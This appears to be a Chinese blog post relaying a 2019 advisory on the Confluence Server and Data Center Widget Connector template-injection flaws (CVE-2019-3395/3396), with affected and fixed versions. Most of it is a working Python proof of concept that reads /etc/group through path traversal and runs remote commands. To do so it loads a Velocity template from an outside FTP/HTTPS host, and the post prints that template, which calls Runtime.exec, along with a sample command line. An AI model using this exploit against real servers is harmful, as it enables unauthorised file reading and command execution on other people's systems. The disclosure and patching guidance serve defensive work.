2019年4月04日,阿里云云盾应急响应中心监测到Confluence 官方发布安全更新,指出 Confluence Server 与 Confluence Data Center 中的 Widget Connector 存在服务端模板注入漏洞,攻击者能利用此漏洞能够实现目录穿越遍历甚至远程命令执行。

漏洞描述

Confluence Server 与 Confluence Data Center 中的 Widget Connector 存在服务端模板注入漏洞,攻击者构造特定请求可远程遍历服务器任意文件,甚至实现远程命令执行攻击。近期有安全研究人员披露漏洞利用PoC,阿里云云盾应急响应中心提醒用户尽快升级相关软件。

漏洞评级

CVE-2019-3395 严重

CVE-2019-3396 严重

影响软件

Confluence Server

Confluence Data Center

安全版本

Version 6.6.12 and higher versions of 6.6.x

Version 6.12.3 and higher versions of 6.12.x

Version 6.13.3 and higher versions of 6.13.x

Version 6.14.2 and higher

POC:

# -*- coding: utf-8 -*-
import re
import sys
import requests

def _read(url):
    result = {}
    # filename = "../web.xml"
    filename = 'file:////etc/group'

    paylaod = url + "/rest/tinymce/1/macro/preview"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
        "Referer": url + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
        "Content-Type": "application/json; charset=utf-8"
    }
    data = '{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
    r = requests.post(paylaod, data=data, headers=headers)
    # print r.content
    if r.status_code == 200 and "wiki-content" in r.text:
        m = re.findall('.*wiki-content">\n(.*)\n            </div>\n', r.text, re.S)

    return m[0]



def _exec(url,cmd):
    result = {}
    filename = "ftp://1.1.1.1/cmd.vm"

    paylaod = url + "/rest/tinymce/1/macro/preview"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
        "Referer": url + "/pages/resumedraft.action?draftId=12345&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
        "Content-Type": "application/json; charset=utf-8"
    }
    data = '{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"http://www.dailymotion.com/video/xcpa64","width":"300","height":"200","_template":"%s","cmd":"%s"}}}' % (filename,cmd)
    r = requests.post(paylaod, data=data, headers=headers)
    # print r.content
    if r.status_code == 200 and "wiki-content" in r.text:
        m = re.findall('.*wiki-content">\n(.*)\n            </div>\n', r.text, re.S)

    return m[0]



if __name__ == '__main__':
    url = sys.argv[1]
    cmd = sys.argv[2]
    print _exec(url,cmd)

svm 文件内容:
把如下代码保存成cmd.vm 放在服务器上,可以使用https协议和ftp协议。 http不行。

#set ($e="exp")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
    $scan.next()
#end

执行python REC_exp.py http://test.wiki_test.cc:8080 "whoami"

知道创宇检测poc

https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py

标签: none

添加新评论